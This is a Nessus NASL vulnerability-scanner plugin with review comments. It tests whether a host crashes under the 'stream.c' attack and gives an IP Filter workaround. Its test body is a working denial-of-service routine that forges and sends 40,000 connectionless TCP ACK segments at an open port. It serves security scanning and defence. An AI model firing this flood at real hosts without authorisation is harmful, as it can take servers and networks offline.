File: stream.nasl

nessus-plugins 1.0.10-2
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

# Registration block. When the scanner runs the plugin with `description`
# set, only the metadata calls below are executed and the script leaves
# through exit(0) before any packet is forged or sent.
if(description)
{
 # Numeric plugin identifier.
 script_id(10271);
 
 # Plugin name, identical in both languages.
 name["english"] = "stream.c";
 name["francais"] = "stream.c";
 script_name(english:name["english"], francais:name["francais"]);
 
 # Report text shown when the check fires. The workaround it carries is an
 # IP Filter rule group: the group head blocks inbound TCP, and the only
 # rule inside the group passes packets with the SYN flag and keeps state.
 # The intent appears to be that TCP segments not belonging to a tracked
 # connection are dropped at the filter - confirm against the IP Filter
 # documentation before deploying the rules.
 desc["english"] = "It was possible
to make the remote server crash
using the 'stream.c' attack. 

A cracker may use this attack to
shut down this server, thus 
preventing your network from
working properly.

Solution : contact your operating
system vendor for a patch.

Workaround : if you use IP filter,
then add these rules :

	block in quick proto tcp from any to any head 100
	pass in quick proto tcp from any to any flags S keep state group 100
	pass in all


Risk factor : High";


 # French version of the same report text.
 # NOTE(review): the accented characters in this string look lost in
 # transit ("avr", "rseau", "rgles", "Elev"); the literal is left as found.
 desc["francais"] = "Il s'est avr
possible de faire planter la 
machine distante en utilisant
l'attaque 'stream.c'. 

Un pirate peut utiliser cette
attaque pour empecher votre
rseau de fonctionner normallement.

Solution : contactez le vendeur
de votre OS pour un patch.

Solution temporaire : Si vous
utilisez IP filter, alors ajoutez
ces rgles :

	block in quick proto tcp from any to any head 100
	pass in quick proto tcp from any to any flags S keep state group 100
	pass in all
	
	
Facteur de risque : Elev";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 # One-line summary for plugin listings.
 summary["english"] = "Crashes the remote host using the 'stream.c' attack";
 summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'stream.c'";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 # ACT_DENIAL declares this as a check that tries to take the target down,
 # not a passive or banner-based test. Scan policies that exclude
 # disruptive checks are expected to key on this category.
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
 # Plugin family used for grouping in the client.
 family["english"] = "Denial of Service";
 family["francais"] = "Dni de service";
 script_family(english:family["english"], francais:family["francais"]);

 
 # Registration ends here; the test code below is not reached in this mode.
 exit(0);
}

#
# The script code starts here
#




# Test body: sends a fixed burst of forged TCP segments at the target, then
# asks the scanner whether the target still responds.

# The packets carry the scanning host's own address as source (this_host()),
# so the burst is attributable to the scanner in the target's logs.
addr = this_host();
# IP id, TCP source port and sequence number start from random values and
# are incremented by one for every packet in the loop.
id = rand();
sport = rand();
seq = rand();

# Use a port the scan already knows to be open; fall back to a random value
# when none is recorded.
# NOTE(review): neither this fallback nor sport is reduced to the valid
# port range here - confirm how forge_tcp_packet() handles larger values.
port = get_host_open_port();
if(!port)port = rand();
			

# start_denial() and end_denial() bracket the burst; the verdict at the end
# of the script is taken from end_denial()'s return value.
start_denial();
for(i=0;i<40000;i=i+1)
{
 id = id + 1;
 sport = sport + 1;
 seq  = seq+1;
 # IPv4 header with a 5-word header length (no options), TTL 255, no
 # fragmentation offset, protocol TCP.
 # NOTE(review): ip_len is given as 20, the header alone; presumably
 # forge_tcp_packet() updates the total length - confirm.
 ip = forge_ip_packet(   ip_v : 4,
			ip_hl : 5,
			ip_tos : 0x08,
			ip_len : 20,
		        ip_id : id,
			ip_p : IPPROTO_TCP,
			ip_ttl : 255,
		        ip_off : 0,
			ip_src : addr);
			
 # TCP header with only the ACK flag set and an acknowledgement number of
 # 0. No handshake precedes it, so the segment belongs to no connection
 # the target knows about - which is the property the stateful filter
 # rules in the plugin description rely on to drop this traffic.
 tcpip = forge_tcp_packet(    ip      : ip,
			     th_sport : sport,    
			     th_dport : port,   
			     th_flags : TH_ACK,
		             th_seq   : seq,
			     th_ack   : 0,
			     th_x2    : 0,
		 	     th_off   : 5,     
			     th_win   : 2048, 
			     th_urp   : 0);
			     
			     
 # pcap_active:FALSE - presumably no capture is opened to wait for a reply;
 # the script never reads one.
 send_packet(tcpip, pcap_active:FALSE);
}
alive = end_denial();

# A false result is reported as a crash: the host is marked dead in the
# knowledge base and a hole is raised on port 0.
# NOTE(review): the verdict rests only on end_denial(); a target that is up
# but temporarily drops or rate-limits traffic after the burst would
# presumably be reported the same way - confirm how end_denial() probes
# liveness before treating the finding as a confirmed crash.
if(!alive)     {
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(0);
                }